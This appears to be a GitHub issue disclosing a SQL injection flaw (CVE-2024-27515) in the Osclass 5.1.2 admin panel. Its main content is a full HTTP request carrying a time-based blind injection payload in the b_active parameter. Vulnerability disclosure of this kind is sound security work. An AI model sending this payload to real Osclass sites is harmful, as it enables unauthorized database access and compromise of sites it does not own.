Open Hebing123 opened 9 months ago
Osclass 5.1.2 has a SQL Injection Vulnerability.
An attacker with administrator rights can execute commands through SQL injection.
GET /oc-admin/index.php?b_active=(select(0)from(select(sleep(4)))v)&b_enabled=0&b_premium=1&b_spam=1&catId=10&city=San%20Francisco&cityId=San%20Francisco&countryId=USA&countryName=hebing123&direction=desc&iDisplayLength=10&page=items®ion=NY®ionId=NY&sSearch=the&sort=date&user=hebing123&userId=hebing123 HTTP/1.1 X-Requested-With: XMLHttpRequest Cookie: osclass=b44r3de2iae3vmvm8at026v7vu; 54f78354eccc6e15622d3aaeccf02ca2=oc_adminId._.oc_adminSecret._.oc_adminLocale._.listing_iDisplayLength%261._.v5qMg6iJ._.en_US._.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 192.168.160.147 Connection: Keep-alive
CVE-2024-27515
Summary
Osclass 5.1.2 has a SQL Injection Vulnerability.
Details
An attacker with administrator rights can execute commands through SQL injection.
Proof of Concept (POC)
Impact